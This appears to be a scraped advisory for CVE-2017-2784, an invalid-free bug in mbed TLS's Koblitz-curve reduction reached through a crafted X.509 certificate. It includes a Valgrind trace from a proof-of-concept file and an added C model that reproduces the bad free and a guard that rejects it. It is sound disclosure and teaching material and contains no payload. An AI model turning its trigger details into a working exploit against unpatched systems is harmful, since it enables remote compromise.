==28084== Command: ./cert_app mode=file filename=/ramdisk/poc.der
==28084==

  . Loading the CA root certificate ... ok (0 skipped)
  . Loading the certificate(s) ...==28084== Invalid free() / delete / delete[] / realloc()
==28084==    at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==28084==    by 0x429784: mbedtls_mpi_grow (bignum.c:130)
==28084==    by 0x42C089: mbedtls_mpi_mul_mpi (bignum.c:1187)
==28084==    by 0x4422C6: ecp_mod_koblitz (ecp_curves.c:1247)
==28084==    by 0x442545: ecp_mod_p224k1 (ecp_curves.c:1304)
==28084==    by 0x437533: ecp_modp (ecp.c:677)
==28084==    by 0x43BAF0: ecp_check_pubkey_sw (ecp.c:1660)
==28084==    by 0x43BFEE: mbedtls_ecp_check_pubkey (ecp.c:1774)
==28084==    by 0x44B57E: pk_get_ecpubkey (pkparse.c:489)
==28084==    by 0x44B956: mbedtls_pk_parse_subpubkey (pkparse.c:623)
==28084==    by 0x4233C7: x509_crt_parse_der_core (x509_crt.c:821)
==28084==    by 0x423789: mbedtls_x509_crt_parse_der (x509_crt.c:952)
==28084==  Address 0xffeffebe0 is on thread 1's stack
==28084==  in frame #3, created by ecp_mod_koblitz (ecp_curves.c:1212)
==28084==
 failed
  !  mbedtls_x509_crt_parse_file returned -19584

==28084==
==28084== HEAP SUMMARY:
==28084==     in use at exit: 32 bytes in 1 blocks
==28084==   total heap usage: 25 allocs, 25 frees, 7,447 bytes allocated
==28084==
==28084== LEAK SUMMARY:
==28084==    definitely lost: 32 bytes in 1 blocks
==28084==    indirectly lost: 0 bytes in 0 blocks
==28084==      possibly lost: 0 bytes in 0 blocks
==28084==    still reachable: 0 bytes in 0 blocks
==28084==         suppressed: 0 bytes in 0 blocks
==28084== Rerun with --leak-check=full to see details of leaked memory
==28084==
==28084== For counts of detected and suppressed errors, rerun with: -v
==28084== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
```

### Timeline

* 2017-01-25 - Vendor Disclosure
* 2017-04-19 - Public Release

### CREDIT

* Discovered by Aleksandar Nikolic of Cisco Talos.

id: SSV:96528
last seen: 2017-11-19
modified: 2017-09-19
published: 2017-09-19
reporter: Root
title: ARM Mbedtls x509 ECDSA invalid public key Remote Code Execution Vulnerability (CVE-2017-2784)
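The Talos analysis above traces the crash to an ownership mismatch: `ecp_mod_koblitz` points `M.p` at a stack array and then calls `mbedtls_mpi_mul_mpi`, which may hand that pointer to the `mbedtls_free` inside `mbedtls_mpi_grow`. The C model below is added here and is neither mbed TLS code nor the upstream fix; it keeps the shape of the three routines, swaps libc allocation for a bump arena whose free checks provenance (so the bad free becomes an error code rather than the abort seen in the backtrace), and contrasts the vulnerable path with a guard that bounds the limb count before arithmetic. The limb width, `SCRATCH_LIMBS`, `P_LIMBS`, the `R` constant and the sample `N` are constructed values for illustration.

```c
/* Added model of the CVE-2017-2784 ownership bug, not mbed TLS code: mbedtls_mpi_grow() frees
 * X->p assuming heap memory, but ecp_mod_koblitz() pointed M.p at a stack array and then ran
 * arithmetic that can grow M. A provenance-checking bump arena replaces malloc/free here, so
 * the invalid free is reported as an error code instead of corrupting the process. */
#include <stdint.h>
#include <string.h>

typedef uint32_t limb_t;                              /* 32-bit limbs keep the arithmetic portable */
typedef struct { int s; size_t n; limb_t *p; } mpi_t; /* same fields as mbedtls_mpi */
#define SCRATCH_LIMBS  5    /* stands in for P_KOBLITZ_MAX + P_KOBLITZ_R (constructed value) */
#define P_LIMBS        4    /* constructed modulus size in limbs */
#define ADJUST         1
#define ERR_ALLOC      (-1)
#define ERR_BAD_INPUT  (-2)
#define ERR_STACK_FREE (-3) /* the condition Valgrind reported as "Invalid free()" */

static limb_t arena[256];
static size_t arena_used;

static limb_t *arena_alloc(size_t n)
{
    if (arena_used + n > sizeof arena / sizeof arena[0]) return NULL;
    limb_t *p = memset(arena + arena_used, 0, n * sizeof(limb_t));
    arena_used += n;
    return p;
}

static int arena_free(const limb_t *p) /* the arena never reuses memory: only provenance matters */
{
    uintptr_t a = (uintptr_t)p;
    return (a >= (uintptr_t)arena && a < (uintptr_t)(arena + arena_used)) ? 0 : ERR_STACK_FREE;
}

/* Model of mbedtls_mpi_grow: reallocate when X needs more limbs and free the old buffer. */
static int mpi_grow(mpi_t *X, size_t nblimbs)
{
    if (X->n >= nblimbs) return 0;
    limb_t *p = arena_alloc(nblimbs);
    if (p == NULL) return ERR_ALLOC;
    if (X->p != NULL) {
        memcpy(p, X->p, X->n * sizeof *p);
        memset(X->p, 0, X->n * sizeof *p);               /* mbedtls_mpi_zeroize */
        if (arena_free(X->p) != 0) return ERR_STACK_FREE; /* mbedtls_free( X->p ): line [1] */
    }
    X->p = p; X->n = nblimbs;
    return 0;
}

static size_t used_limbs(const mpi_t *A) /* mbedtls_mpi_mul_mpi trims leading zero limbs too */
{
    size_t i = A->n;
    while (i > 0 && A->p[i - 1] == 0) i--;
    return i;
}

/* Model of mbedtls_mpi_mul_mpi: schoolbook X = A * B into a temp, then grow X to i + j limbs. */
static int mpi_mul(mpi_t *X, const mpi_t *A, const mpi_t *B)
{
    size_t i = used_limbs(A), j = used_limbs(B);
    limb_t *T = arena_alloc(i + j);
    if (T == NULL) return ERR_ALLOC;
    for (size_t a = 0; a < i; a++) {
        uint64_t carry = 0;
        for (size_t b = 0; b < j; b++) {
            uint64_t t = (uint64_t)A->p[a] * B->p[b] + T[a + b] + carry;
            T[a + b] = (limb_t)t; carry = t >> 32;
        }
        T[a + j] = (limb_t)carry;
    }
    int ret = mpi_grow(X, i + j);
    if (ret != 0) return ret;
    memcpy(X->p, T, (i + j) * sizeof *T);
    return 0;
}

/* Model of the top of ecp_mod_koblitz: M borrows the stack array Mp, takes the limbs of N above
 * the modulus and is multiplied by R. guard == 0 is the vulnerable shape; guard != 0 refuses any
 * input whose product could outgrow Mp, so mpi_grow is never asked to free it. */
static int koblitz_step(const mpi_t *N, int guard)
{
    static limb_t Rp[1] = { 0x1a1 };    /* constructed constant, not the real secp224k1 R */
    const mpi_t R = { 1, 1, Rp };
    limb_t Mp[SCRATCH_LIMBS] = { 0 };   /* [1]: scratch on the stack */
    mpi_t M = { 1, 0, Mp };             /* [2]: M.p now points into this stack frame */
    if (N->n < P_LIMBS) return 0;       /* nothing above the modulus, nothing to reduce */
    M.n = N->n - (P_LIMBS - ADJUST);
    if (M.n > SCRATCH_LIMBS) return ERR_BAD_INPUT; /* overflowing Mp itself is not modelled */
    memcpy(Mp, N->p + (P_LIMBS - ADJUST), M.n * sizeof *Mp);
    if (guard && used_limbs(&M) + used_limbs(&R) > SCRATCH_LIMBS)
        return ERR_BAD_INPUT;           /* the product would make mpi_grow free Mp */
    return mpi_mul(&M, &M, &R);         /* [3]: the vulnerable path reaches mpi_grow */
}

/* Constructed N of 8 limbs, as after squaring a 4-limb coordinate; top_limb selects the case. */
int reduce_case(limb_t top_limb, int guard)
{
    limb_t Np[8] = { 1, 2, 3, 4, 5, 6, 7, top_limb };
    const mpi_t N = { 1, 8, Np };
    return koblitz_step(&N, guard);
}
```

Compile it with a `main` that calls `reduce_case(0, 0)`, `reduce_case(9, 0)` and `reduce_case(9, 1)`: the benign input reduces in place, the crafted input reaches the free of `Mp` on the unguarded path, and the guard rejects the same input before any arithmetic runs.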

Talos

id: TALOS-2017-0274
last seen: 2019-05-29
published: 2017-04-19
reporter: Talos Intelligence
source: http://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0274
title: ARM Mbedtls x509 ECDSA invalid public key Remote Code Execution Vulnerability